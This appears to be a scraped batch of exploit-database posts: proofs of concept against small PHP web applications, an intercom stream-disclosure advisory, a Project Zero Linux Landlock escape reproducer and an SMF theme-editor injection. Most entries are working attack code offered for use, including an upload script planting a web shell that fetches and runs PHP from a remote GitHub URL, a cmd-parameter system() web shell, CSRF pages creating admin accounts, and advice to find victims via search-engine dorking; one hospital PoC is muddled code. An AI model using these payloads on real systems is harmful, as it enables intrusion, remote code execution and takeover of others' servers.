<pre><code>=============================================================================================================================================<br />| # Title : Alphaware E-CommerceSystem 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/11676/alphaware-simple-e-commerce-system.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This payload injects php code of your choice into an SHELL.php file. <br /><br />[+] The web application allows for an unauthenticated file upload which can result in a Remote Code Execution.<br /> combine this issue with an sql injection to retrieve the randomised name of our uploaded php shell.<br /><br />[+] save payload as poc.php<br /><br />[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1<br /><br />[+] payload : <br /><br /><?php<br /><br />function file_upload($target_ip) {<br /> $file_name = "indoushka.php";<br /><br /> $webshell_payload = "<?php<br /> \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';<br /> \$ch = curl_init();<br /> curl_setopt(\$ch, CURLOPT_URL, \$url);<br /> curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);<br /> \$output = curl_exec(\$ch);<br /> curl_close(\$ch);<br /> if (\$output) {<br /> // Safely include the content of the remote PHP file<br /> include 'data://text/plain;base64,' . base64_encode(\$output);<br /> }<br /> ?>";<br /><br /> $post_fields = array(<br /> 'add' => '',<br /> 'product_image' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),<br /> 'product_name' => 'inouva',<br /> 'product_price' => '123',<br /> 'product_size' => '99',<br /> 'brand' => 'N0_name',<br /> 'category' => 'Hackers',<br /> 'qty' => '1'<br /> );<br /><br /> echo "(+) PHP Code Injection ...\n";<br /><br /> $ch = curl_init();<br /> curl_setopt($ch, CURLOPT_URL, "http://$target_ip/alphaware/admin/admin_football.php");<br /> curl_setopt($ch, CURLOPT_POST, 1);<br /> curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);<br /> curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<br /><br /> $response = curl_exec($ch);<br /> curl_close($ch);<br /><br /> echo "(+) Shell uploaded successfully.\n";<br /> echo "(+) Access the shell at: http://$target_ip/alphaware/photo/$file_name\n";<br />}<br /><br />if ($argc != 2) {<br /> echo "(+) Usage: php " . $argv[0] . " <target ip>\n";<br /> echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";<br /> exit(-1);<br />}<br /><br />$target_ip = $argv[1];<br />file_upload($target_ip);<br /><br /><br />[+] Path : http://127.0.0.1/alphaware/photo/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code><br />Akuvox Smart Intercom/Doorphone Unauthenticated Stream Disclosure<br /><br /><br />Vendor: The Akuvox Company<br />Product web page: https://www.akuvox.com<br />Affected version: Doorphone:<br /> S539<br /> S532<br /> X916<br /> X915<br /> X912<br /> R29<br /> Intercom:<br /> R20K-2<br /> R20A-2<br /> C313W-2<br /> NS-2<br /> NC-2<br /> NX-2<br /> Firmware: 912.30.1.137<br /><br />Summary: Vandal-resistant Door Phone for High-end Buildings. Offering<br />top-of-the-line features, Akuvox X912 is targeted at high-end residential<br />and commercial projects. With a compact size, it is perfect for buildings<br />with limited installation space.<br /><br />Desc: The application suffers from an unauthenticated live stream disclosure<br />when requesting video.cgi endpoint on port 8080.<br /><br />Tested on: lighttpd/1.4.30<br /> EasyHttpServer<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2024-5826<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5826.php<br /><br /><br />25.02.2024<br /><br />--<br /><br /><br />$ firefox http://192.168.1.2:8080/video.cgi<br /></code></pre>
<pre><code>Linux: landlock can be disabled thanks to missing cred_transfer hook; and Smack looks dodgy too<br /><br />I found a logic bug that makes it possible for a process to get rid of all Landlock restrictions applied to it:<br />When a process' cred struct is replaced, this _almost_ always invokes the cred_prepare LSM hook; but in one special case (when KEYCTL_SESSION_TO_PARENT updates the parent's credentials), the cred_transfer LSM hook is used instead. Landlock only implements the cred_prepare hook, not cred_transfer, so KEYCTL_SESSION_TO_PARENT causes all information on Landlock restrictions to be lost.<br /><br />The one piece of good news about this is that it requires access to the keyctl() syscall; and I think Landlock is typically used in combination with some kind of seccomp allowlist, which will probably _usually_ make this issue unreachable from sandboxed code?<br /><br />I had a look at the other LSMs that have cred_prepare or cred_transfer hooks:<br /><br /> - AppArmor handles both hooks in the same way, that's fine<br /> - SELinux handles both hooks in the same way, that's fine<br /> - Tomoyo only handles cred_prepare, not cred_transfer, but it only uses the<br /> hook for something weird that's unrelated to the actual cred structs, so<br /> that's probably fine<br /> - Smack handles both but handles them differently; smack_cred_transfer() only<br /> transfers a subset of the information that smack_cred_prepare() transfers.<br /> That looks a bit dodgy to me but I don't really understand Smack - Casey, can<br /> you check if Smack handles KEYCTL_SESSION_TO_PARENT correctly?<br /><br />I will send a suggested fix for Landlock in a minute.<br /><br /><br />Here's a reproducer for escaping from Landlock confinement, tested on latest<br />mainline (at commit 786c8248dbd33a5a7a07f7c6e55a7bfc68d2ca48):<br /><br />```<br />user@vm:~/landlock-houdini$ cat landlock-houdini.c<br />#define _GNU_SOURCE<br />#include <unistd.h><br />#include <err.h><br />#include <stdint.h><br />#include <stdlib.h><br />#include <fcntl.h><br />#include <stdio.h><br />#include <sys/prctl.h><br />#include <sys/wait.h><br />#include <sys/syscall.h><br />#include <linux/keyctl.h><br /><br />/* stuff from the landlock header */<br />struct landlock_ruleset_attr {<br /> uint64_t handled_access_fs;<br />};<br />#define LANDLOCK_ACCESS_FS_WRITE_FILE (1ULL << 1)<br /><br /><br />#define SYSCHK(x) ({ \\<br /> typeof(x) __res = (x); \\<br /> if (__res == (typeof(x))-1) \\<br /> err(1, \"SYSCHK(\" #x \")\"); \\<br /> __res; \\<br />})<br /><br />int main(void) {<br /> /* == tell landlock to block opening any files for writing == */<br /> SYSCHK(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0));<br /> struct landlock_ruleset_attr ruleset_attr = {<br /> .handled_access_fs = LANDLOCK_ACCESS_FS_WRITE_FILE<br /> };<br /> int ruleset = SYSCHK(syscall(444/*__NR_landlock_create_ruleset*/, &ruleset_attr, sizeof(ruleset_attr), 0));<br /> SYSCHK(syscall(446/*__NR_landlock_restrict_self*/, ruleset, 0));<br /><br /><br /> /* == make sure we really can't open files for writing == */<br /> int open_res = open(\"/dev/null\", O_WRONLY);<br /> if (open_res != -1)<br /> errx(1, \"open for write still worked after sandboxing???\");<br /> perror(\"open for write failed as expected\");<br /><br /><br /> /* == try to escape from landlock == */<br /> /* needed for KEYCTL_SESSION_TO_PARENT permission checks */<br /> SYSCHK(syscall(__NR_keyctl, KEYCTL_JOIN_SESSION_KEYRING, NULL, 0, 0, 0));<br /> pid_t child = SYSCHK(fork());<br /> if (child == 0) {<br /> /*<br /> * KEYCTL_SESSION_TO_PARENT is a no-op unless we have a different session<br /> * keyring in the child, so make that happen.<br /> */<br /> SYSCHK(syscall(__NR_keyctl, KEYCTL_JOIN_SESSION_KEYRING, NULL, 0, 0, 0));<br /><br /> /*<br /> * This is where the magic happens:<br /> * KEYCTL_SESSION_TO_PARENT installs credentials on the parent that<br /> * never go through the cred_prepare hook, this path uses cred_transfer<br /> * instead.<br /> * So basically after this call, the parent's landlock restrictions<br /> * are gone.<br /> */<br /> SYSCHK(syscall(__NR_keyctl, KEYCTL_SESSION_TO_PARENT, 0, 0, 0, 0));<br /> exit(0);<br /> }<br /> int wstatus;<br /> SYSCHK(waitpid(child, &wstatus, 0));<br /> if (!WIFEXITED(wstatus) || WEXITSTATUS(wstatus) != 0)<br /> errx(1, \"child failed unexpectedly, unable to test bug\");<br /><br /><br /> /* retry the same operation that was previously blocked to see if we escaped */<br /> int open_res2 = open(\"/dev/null\", O_WRONLY);<br /> if (open_res2 != -1)<br /> errx(1, \"open for write works again, VULNERABLE!\");<br /> perror(\"open for write failed as it should, seems fixed\");<br />}<br />user@vm:~/landlock-houdini$ gcc -o landlock-houdini landlock-houdini.c -Wall<br />user@vm:~/landlock-houdini$ ./landlock-houdini<br />open for write failed as expected: Permission denied<br />landlock-houdini: open for write works again, VULNERABLE!<br />user@vm:~/landlock-houdini$<br />```<br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this<br />issue is made available to users before the end of the 90-day deadline,<br />this bug report will become public 30 days after the fix was made<br />available. Otherwise, this bug report will become public at the deadline.<br />The scheduled deadline is 2024-10-22.<br /><br />For more details, see the Project Zero vulnerability disclosure policy:<br />https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-<br />policy.html<br /><br />Related CVE Numbers: CVE-2024-42318.<br /><br /><br /><br />Found by: jannh@google.com<br /><br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Lost and Found Information System v1.0 v1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-lfis.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following JavaScript code :<br /><br /> creating a POST request using JavaScript to send certain data to a local server via HTTP. Here are the key points:<br /><br />[+] Create an XMLHttpRequest object:<br /><br /> xhr = new XMLHttpRequest(); Creates an XMLHttpRequest object that is used to send requests to the server.<br /><br />[+] Open the request:<br /><br /> xhr.open("POST", "http://127.0.0.1/php-lfis/classes/Users.php?f=save", true); Opens a connection to the specified URL (in this case, a local server) <br /> using the HTTP method "POST".<br /><br />[+] Set the request headers:<br /><br /> xhr.setRequestHeader("Accept", "*/*"); Specifies that the request accepts any type of response.<br /> xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); Specifies that the request accepts responses in English.<br /> xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------"); Specifies the content type of the request <br /> as multipart/form-data with specified boundaries.<br /><br />[+] Enable sending cookies:<br /><br /> xhr.withCredentials = true; Specifies that cookies should be sent with the request.<br /><br />[+] Setting up the request data:<br /><br /> The body is set up using a string containing the form data parts. Each part contains information such as username, password, and type.<br /><br /> This string is converted to a Uint8Array and then to a Blob to be sent.<br /><br />[+] Sending the request:<br /><br /> xhr.send(new Blob([aBody])); Sends the data to the server.<br /><br />[+] User Interface:<br /> There is a button inside the HTML form that calls the submitRequest() function when clicked, which executes the request.<br /><br />[+] Go to the line 6. Set the target site link Save changes and apply . <br /><br />[+] infected file : Users.php.<br /><br />[+] Line 15 : Choose a name "indoushka".<br /><br />[+] Line 19 : Choose a pass "Hacked".<br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html> <br /><html> <br /><body><br /> <script> function submitRequest() <br /> { var xhr = new XMLHttpRequest(); <br /> xhr.open("POST", "http:\/\/127.0.0.1\/php-lfis\/classes\/Users.php?f=save", true); <br /> xhr.setRequestHeader("Accept", "*\/*"); <br /> xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");<br /> xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");<br /> xhr.withCredentials = true; <br /> var body =<br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"username\"\r\n" + <br /> "\r\n" + <br /> "indoushka\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"password\"\r\n" + <br /> "\r\n" + <br /> "Hacked\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"type\"\r\n" + <br /> "\r\n" + <br /> "1\r\n" + <br /> "-------------------------------\r\n"; <br /> var aBody = new Uint8Array(body.length); <br /> for (var i = 0; i < aBody.length; i++) <br /> aBody[i] = body.charCodeAt(i); <br /> xhr.send(new Blob([aBody])); <br /> }<br /> </script><br /> <form action="#"><br /> <input type="button" value="Submit request" onclick="submitRequest();" /><br /> </form> <br /> </body> <br /> </html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Loan Management System 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This HTML page :<br /><br /> is a user registration form that allows users to input a username, password, and upload an avatar image. <br /> The form data is then sent via an AJAX request to a server-side script for processing.<br /><br />[+] Here's a breakdown of how it works:<br /><br /> HTML Structure<br /><br /> Form Elements:<br /> <br /> username: A text field where the user can input their username.<br /> password: A password field for entering a password.<br /> img: A file input for uploading an avatar image (restricted to image file types).<br /><br /> Save User Button:<br /> <br /> An input element with the type button is used to trigger the saveUser() function when clicked.<br /><br />[+] JavaScript (AJAX Request)<br /><br /> <br /> AJAX Request:<br /> <br /> An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).<br /> The request method is POST, and the data is sent to the specified URL.<br /> The onload function checks if the request was successful (status code 200). If it was,<br /> it alerts the user that the save was successful; otherwise, it alerts the user of an error.<br /><br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>User Registration</title><br /></head><br /><body><br /><br /> <h2>User Registration</h2><br /> <form id="userForm" enctype="multipart/form-data"><br /> <label for="username">Username:</label><br /> <input type="text" id="username" name="username" required><br><br><br /><br /> <label for="password">Password:</label><br /> <input type="password" id="password" name="password" required><br><br><br /><br /> <input type="button" value="Save User" onclick="saveUser()"><br /> </form><br /><br /> <script><br /> function saveUser() {<br /> var form = document.getElementById('userForm');<br /> var formData = new FormData(form);<br /><br /> var xhr = new XMLHttpRequest();<br /> xhr.open("POST", "http://127.0.0.1/loan/ajax.php?action=save_user", true);<br /><br /> xhr.onload = function () {<br /> if (xhr.status === 200) {<br /> alert('User saved successfully');<br /> } else {<br /> alert('An error occurred while saving the user');<br /> }<br /> };<br /><br /> xhr.send(formData);<br /> }<br /> </script><br /><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code># Exploit Title: Authenticated Code Injection - smfv2.1.4<br /># Date: 8/2024<br /># Exploit Author: Andrey Stoykov<br /># Version: 2.1.4<br /># Tested on: Ubuntu 22.04<br /># Blog:<br />https://msecureltd.blogspot.com/2024/06/friday-fun-pentest-series-7-smfv214.html<br /><br />Code Injection Authenticated:<br /><br />Steps to Reproduce:<br /><br />1. Login as admin<br />2. Browse to "Current Theme"<br />3. Click on "Modify Themes" > "SMF Default Theme"<br />4. Click on Admin.template.php<br />5. In the first box enter the PHP payload "<?php system('cat /etc/passwd')<br />?>"<br /><br /><br />// HTTP POST request showing the code injection payload<br /><br />POST /SMFdbwci7dy0o/index.php?action=admin;area=theme;th=1;sa=edit HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />[...]<br /><br />entire_file[]=<?php+system('cat /etc/passwd') ?>[...]<br /><br /><br />// HTTP response showing /etc/passwd contents<br /><br />HTTP/1.1 200 OK<br />Server: Apache<br />Pragma: no-cache<br />[...]<br /><br />[...]<br />root:x:0:0:root:/root:/bin/bash<br />bin:x:1:1:bin:/bin:/sbin/nologin<br />daemon:x:2:2:daemon:/sbin:/sbin/nologin<br />adm:x:3:4:adm:/var/adm:/sbin/nologin<br />lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin<br />[...]<br /><br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : biobook Social Networking Site 1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/janobe/Social%20Networking%20Site%20in%20PHP%20with%20Full%20Source%20Code.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code uploads a executable malicious file remotely .<br /><br />[+] Go to the line 7.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] save code as poc.html .<br /><br /><div id="right-nav"><br /> <h1>Update Status</h1><br /> <div><br /> <form method="post" action="http://127.0.0.1/social/post.php" enctype="multipart/form-data"><br /> <textarea placeholder="Whats on your mind?" name="content" class="post-text" required=""></textarea><br /> <input type="file" name="image"><br /> <button class="btn-share" name="Submit" value="Log out">Share</button><br /> </form><br /> </div><br /> <br /> </div><br /> <br />[+] http://127.0.0.1/social/upload/<br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Accounting Journal Management System 1.0 php code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/ajms_0_0.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This payload injects code of your choice into an HTML page. <br /> <br /> You give it a name and save it in the root directory of the script. and executes it remotely.<br /><br />[+] Line 11 : 'Content[welcome]' = Replace "welcome" with any label you want.<br /><br />[+] Line 11 : Replace the payload as you wish = <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?><br /><br />[+] save payload as poc.html <br /><br />[+] Set your target url<br /><br />[+] payload : <br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title> PHP code injection Tool</title><br /> <script><br /> async function sendRequest() {<br /> const url = document.getElementById('url').value;<br /> const postData = {<br /> 'content[welcome]': `<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>`<br /> };<br /><br /> try {<br /> const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {<br /> method: 'POST',<br /> headers: {<br /> 'Content-Type': 'application/x-www-form-urlencoded'<br /> },<br /> body: new URLSearchParams(postData).toString()<br /> });<br /><br /> if (response.ok) {<br /> document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';<br /><br /> } else {<br /> document.getElementById('result').innerText = 'Error: ' + response.statusText;<br /> }<br /> } catch (error) {<br /> document.getElementById('result').innerText = 'Error making request: ' + error.message;<br /> }<br /> }<br /> </script><br /></head><br /><body><br /> <h1>Injection Tool</h1><br /> <form onsubmit="event.preventDefault(); sendRequest();"><br /> <label for="url">Enter URL:</label><br /> <input type="text" id="url" name="url" required><br /> <button type="submit">Submit</button><br /> </form><br /> <pre id="result"></pre><br /></body><br /></html><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : ABIC cardiology Management System 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://abicegypt.com/ |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /> <br />[+] Line 7 : Set your target url<br /><br />[+] save payload as poc.html <br /><br />[+] payload : <br /><br /><div class="panel panel-default panel-table"><br /> <div class="panel-heading"> <h2 class="text-center">New User </h2><br /> </div><br /> <div class="panel-body"><br /> <div class="col-md-offset-2 col-md-8"><br /><br /><form action="https://127.0.0.1.com/eg-admin/users/insert.php?" method="post" enctype="multipart/form-data" name="form1" id="form1"><br /><br /> <div class="form-group"> User Name<br /> <input type="text" name="username" class="form-control" placeholder="Insert User Name"><br /> </div><br /> <div class="form-group"> Password<br /> <input type="text" name="password" class="form-control" placeholder="Insert Password"><br /> </div><br /><br /> <div class="col-xs-12"><br /> <button type="submit" class="btn btn-primary btn-xl" name="add"> SAVE </button><br /> </div><br /> <input type="hidden" name="MM_insert" value="form1"><br /></form><br /><br /> </div><br /> </div><br /> </div><br /><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Hospital Management System 1.0(WYSIWYG) code injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |<br />| # Vendor : https://phpgurukul.com/wp-content/uploads/2017/12/Hostel-Management-Syste-Updated-Code.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Part 01 : about-us.php<br /><br />[+] This payload injects code of your choice into the database via NicEdit is a WYSIWYG editor V: 0.9 r25 which is called inside the file /hms/admin/about-us.php . <br /> <br />[+] Line 2 : Make sure to include your database connection here<br /><br />[+] Line 44 : Send the form data using fetch API (Set your target url)<br /><br />[+] save payload as poc.php in your localhost path .<br /><br />[+] payload : <br /><br /><?php<br />include('http://127.0.0.1/hospital/hms/admin/include/config.php'); // Make sure to include your database connection here<br /><br />if (isset($_POST['submit'])) {<br /> $pagetitle = $_POST['pagetitle'];<br /> $pagedes = $con->real_escape_string($_POST['pagedes']);<br /> $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes' WHERE PageType='aboutus'");<br /><br /> if ($query) {<br /> echo '<script>alert("About Us has been updated.")</script>';<br /> } else {<br /> echo '<script>alert("Something Went Wrong. Please try again.")</script>';<br /> }<br /> exit;<br />}<br />?><br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>indoushka | Update About Us Content</title><br /> <!-- NicEdit Script --><br /> <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script><br /> <script type="text/javascript"><br /> // Apply NicEdit to all text areas when the DOM is loaded<br /> bkLib.onDomLoaded(nicEditors.allTextAreas);<br /><br /> // Function to handle form submission using JavaScript<br /> function submitForm(event) {<br /> event.preventDefault(); // Prevent default form submission<br /><br /> const pagetitle = document.getElementById('pagetitle').value;<br /> const pagedes = nicEditors.findEditor('pagedes').getContent(); // Get the NicEdit content<br /><br /> // Prepare the form data to be sent<br /> const formData = new FormData();<br /> formData.append('pagetitle', pagetitle);<br /> formData.append('pagedes', pagedes);<br /> formData.append('submit', true);<br /><br /> // Send the form data using fetch API<br /> fetch('http://127.0.0.1/hospital/hms/admin/about-us.php', {<br /> method: 'POST',<br /> body: formData,<br /> })<br /> .then(response => response.text())<br /> .then(data => {<br /> alert('About Us content has been updated successfully.');<br /> console.log(data); // Handle the response from the server<br /> })<br /> .catch(error => {<br /> console.error('Error:', error);<br /> });<br /> }<br /> </script><br /> <style><br /> /* Center the form container */<br /> .editor-container {<br /> max-width: 800px;<br /> margin: 0 auto; /* Center horizontally */<br /> padding: 20px;<br /> text-align: center; /* Center the content inside */<br /> }<br /><br /> /* Ensure the textarea takes the full width */<br /> #pagedes {<br /> width: 100%;<br /> height: 300px;<br /> margin: 0 auto;<br /> }<br /> </style><br /></head><br /><body><br /> <div id="app"><br /> <div class="app-content"><br /> <div class="main-content"><br /> <div class="wrap-content container" id="container"><br /> <!-- Page Title Section --><br /> <section id="page-title"><br /> <div class="row"><br /> <div class="col-sm-8"><br /> <h1 class="mainTitle">Update the About Us Content</h1><br /> </div><br /> <br /> </li><br /> </ol><br /> </div><br /> </section><br /> <!-- Form Section --><br /> <div class="container-fluid container-fullw bg-white"><br /> <div class="row"><br /> <div class="col-md-12"><br /> <!-- Centering the form using a wrapper div --><br /> <div class="editor-container"><br /> <form class="forms-sample" method="post" onsubmit="submitForm(event);"><br /> <div class="form-group"><br /> <label for="pagetitle">Page Title</label><br /> <input id="pagetitle" name="pagetitle" type="text" class="form-control" required><br /> </div><br /> <div class="form-group"><br /> <label for="pagedes">Page Description</label><br /> <!-- NicEdit will enhance this textarea --><br /> <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea><br /> </div><br /> <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button><br /> </form><br /> </div><br /> </div><br /> </div><br /> </div><br /> <!-- End Form Section --><br /> </div><br /> </div><br /> </div><br /> </div><br /> <!-- Footer --><br /></body><br /></html><br /><br />---------------------- [+] Part 02 : contact.php [+] --------------------<br /><br />[+] Line 4 : Make sure to include your database connection here<br /><br />[+] Line 60 : Send the form data using fetch API (Set your target url)<br /><br />[+] save payload as poc.php in your localhost path .<br /><br />[+] payload : <br /><br /><?php<br /><br />// عنوان الخادم الخارجي<br />$url = 'http://127.0.0.1/hospital/hms/admin/include/config.php';<br /><br />// جلب البيانات من الخادم الخارجي<br />$response = file_get_contents($url);<br /><br />// التحقق من وجود البيانات<br />if ($response !== FALSE) {<br /> // التعامل مع البيانات<br /> echo $response;<br />} else {<br /> echo 'حدث خطأ أثناء جلب البيانات.';<br />}<br /><br />if (isset($_POST['submit'])) {<br /> $pagetitle = $_POST['pagetitle'];<br /> $pagedes = $con->real_escape_string($_POST['pagedes']);<br /> $email = $con->real_escape_string($_POST['email']);<br /> $mobnum = $con->real_escape_string($_POST['mobnum']);<br /> <br /> $query = mysqli_query($con, "UPDATE tblpage SET PageTitle='$pagetitle', PageDescription='$pagedes', Email='$email', MobileNumber='$mobnum' WHERE PageType='contactus'");<br /><br /> if ($query) {<br /> echo '<script>alert("Contact Us has been updated.")</script>';<br /> } else {<br /> echo '<script>alert("Something Went Wrong. Please try again.")</script>';<br /> }<br /> exit;<br />}<br /><br />?><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Admin | Update Contact Us Content</title><br /> <!-- NicEdit Script --><br /> <script src="http://js.nicedit.com/nicEdit-latest.js" type="text/javascript"></script><br /> <script type="text/javascript"><br /> bkLib.onDomLoaded(nicEditors.allTextAreas);<br /><br /> function submitForm(event) {<br /> event.preventDefault();<br /><br /> const pagetitle = document.getElementById('pagetitle').value;<br /> const pagedes = nicEditors.findEditor('pagedes').getContent();<br /> const email = document.getElementById('email').value;<br /> const mobnum = document.getElementById('mobnum').value;<br /><br /> const formData = new FormData();<br /> formData.append('pagetitle', pagetitle);<br /> formData.append('pagedes', pagedes);<br /> formData.append('email', email);<br /> formData.append('mobnum', mobnum);<br /> formData.append('submit', true);<br /><br /> fetch('http://127.0.0.1/hospital/hms/admin/contact.php', {<br /> method: 'POST',<br /> body: formData,<br /> })<br /> .then(response => response.text())<br /> .then(data => {<br /> alert('Contact Us content has been updated successfully.');<br /> console.log(data);<br /> })<br /> .catch(error => {<br /> console.error('Error:', error);<br /> });<br /> }<br /> </script><br /> <style><br /> .editor-container {<br /> max-width: 800px;<br /> margin: 0 auto;<br /> padding: 20px;<br /> text-align: center;<br /> }<br /><br /> #pagedes {<br /> width: 100%;<br /> height: 300px;<br /> margin: 0 auto;<br /> }<br /> </style><br /></head><br /><body><br /> <div id="app"><br /> <div class="app-content"><br /> <div class="main-content"><br /> <div class="wrap-content container" id="container"><br /> <section id="page-title"><br /> <div class="row"><br /> <div class="col-sm-8"><br /> <h1 class="mainTitle">Admin | Update Contact Us Content</h1><br /> </div><br /> <ol class="breadcrumb"><br /> <li class="active"><br /> <span>Update Contact Us Content</span><br /> </li><br /> </ol><br /> </div><br /> </section><br /> <div class="container-fluid container-fullw bg-white"><br /> <div class="row"><br /> <div class="col-md-12"><br /> <div class="editor-container"><br /> <form class="forms-sample" method="post" onsubmit="submitForm(event);"><br /> <div class="form-group"><br /> <label for="pagetitle">Page Title</label><br /> <input id="pagetitle" name="pagetitle" type="text" class="form-control" required><br /> </div><br /> <div class="form-group"><br /> <label for="pagedes">Page Description</label><br /> <textarea class="form-control" name="pagedes" id="pagedes" rows="12"></textarea><br /> </div><br /> <div class="form-group"><br /> <label for="email">Email</label><br /> <input id="email" name="email" type="email" class="form-control" required><br /> </div><br /> <div class="form-group"><br /> <label for="mobnum">Mobile Number</label><br /> <input id="mobnum" name="mobnum" type="text" class="form-control" required><br /> </div><br /> <button type="submit" class="btn btn-primary mr-2" name="submit">Submit</button><br /> </form><br /> </div><br /> </div><br /> </div><br /> </div><br /> </div><br /> </div><br /> </div><br /> </div><br /></body><br /></html><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>